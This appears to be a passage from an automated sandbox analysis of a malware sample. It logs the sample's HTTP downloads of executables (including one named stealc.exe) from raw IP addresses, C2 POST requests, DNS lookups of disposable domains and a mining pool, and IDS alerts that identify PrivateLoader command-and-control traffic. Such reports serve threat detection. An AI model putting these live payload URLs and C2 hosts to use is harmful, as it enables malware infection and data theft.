Source: global traffic	HTTP traffic detected: GET /prog/66b623c3b1dcb_Mowdiewart.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66ae9cc050ded_file0308.exe#fileotr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/525403 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 194.58.114.223Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b45c742e0a1_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b5ac1092454_otraba.exe#otr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b24859611ad_agent_3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b5d9d3adbaa_defaultr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b5b75106ac6_stealc.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Content-Length: 517Host: 185.225.200.214
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: arpdabl.zapto.orgContent-Length: 5537Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?KubbvdjJfOkOrksIlOLwwrZZFcTPifwjk HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?TCtDuRUdKYZTtiynHOebqmOBgoFjjnvzy HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?rwPMUQxcTIPiQpiDrtjTaQVThGnaNHXkE HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.164.97
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.164.97
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 185.225.200.214
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.114.223
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /temp/random.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: helleaa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=TQkFGfEYadGUE57Kfip1wvX0OHkU_Ir9uw4pAsm89UU-1723299142-1.0.1.1-EMUSdkltkyg45WsAAuxNg9RrPCV2qvYpSr1oeNLMcDnmI4_1mvkyehqC3u6IicirJoNCt26JZkx8xXFXqNvbzw; _cfuvid=kuQ1QPcubEVwRLbFnIoZ7sfufmJbnwwA_AHPO2yuLiM-1723299142296-0.0.1.1-604800000
Source: global traffic	HTTP traffic detected: GET /doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZLVNzU3FtB3MumkHq06odvtZCiVngKoCNbdNz&api=1&no_preview=1#launc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1cN8u7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: yip.su
Source: global traffic	HTTP traffic detected: GET /profiles/76561199751190313 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: 78.46.239.218Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.47.169
Source: global traffic	HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 185.225.200.214
Source: global traffic	HTTP traffic detected: GET /inc/armadegon.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b623c3b1dcb_Mowdiewart.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66ae9cc050ded_file0308.exe#fileotr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d/525403 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 194.58.114.223Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b45c742e0a1_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b5ac1092454_otraba.exe#otr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b24859611ad_agent_3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b5d9d3adbaa_defaultr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66b5b75106ac6_stealc.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.47.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?KubbvdjJfOkOrksIlOLwwrZZFcTPifwjk HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.rapidfilestorage.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?TCtDuRUdKYZTtiynHOebqmOBgoFjjnvzy HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: helsinki-dtc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /updates/yd/yt_wrtzr_1/win/version.txt?rwPMUQxcTIPiQpiDrtjTaQVThGnaNHXkE HTTP/1.1Accept: /Cache-Control: no-cacheAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: skrptfiles.tracemonitors.comConnection: Keep-Alive

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.facebook.com (Facebook)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.twitter.com (Twitter)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.youtube.com (Youtube)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.facebook.com (Facebook)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.twitter.com (Twitter)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp equals www.youtube.com (Youtube)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /cspN equals www.facebook.com (Facebook)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /cspN equals www.twitter.com (Twitter)
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /cspN equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: api.myip.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: vk.com
Source: global traffic	DNS traffic detected: DNS query: helleaa.com
Source: global traffic	DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic	DNS traffic detected: DNS query: yip.su
Source: global traffic	DNS traffic detected: DNS query: enfixxysdjsip.shop
Source: global traffic	DNS traffic detected: DNS query: celebratioopz.shop
Source: global traffic	DNS traffic detected: DNS query: writerospzm.shop
Source: global traffic	DNS traffic detected: DNS query: deallerospfosu.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: bassizcellskz.shop
Source: global traffic	DNS traffic detected: DNS query: agent-runner-service2.com
Source: global traffic	DNS traffic detected: DNS query: mennyudosirso.shop
Source: global traffic	DNS traffic detected: DNS query: languagedscie.shop
Source: global traffic	DNS traffic detected: DNS query: complaintsipzzx.shop
Source: global traffic	DNS traffic detected: DNS query: pool.hashvault.pro
Source: global traffic	DNS traffic detected: DNS query: quialitsuzoxm.shop
Source: global traffic	DNS traffic detected: DNS query: tenntysjuxmz.shop
Source: global traffic	DNS traffic detected: DNS query: arpdabl.zapto.org
Source: global traffic	DNS traffic detected: DNS query: service-domain.xyz
Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: www.rapidfilestorage.com
Source: global traffic	DNS traffic detected: DNS query: helsinki-dtc.com
Source: global traffic	DNS traffic detected: DNS query: skrptfiles.tracemonitors.com
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: enfixxysdjsip.shop

Source: Network traffic	Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.4:49732 -> 185.225.200.214:80
Source: Network traffic	Suricata IDS: 2054709 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (GET) : 192.168.2.4:49731 -> 147.45.47.169:80
Source: Network traffic	Suricata IDS: 2054710 - Severity 1 - ET MALWARE PrivateLoader CnC Response : 185.225.200.214:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2054711 - Severity 1 - ET MALWARE PrivateLoader CnC Activity (POST) : 192.168.2.4:49732 -> 185.225.200.214:80
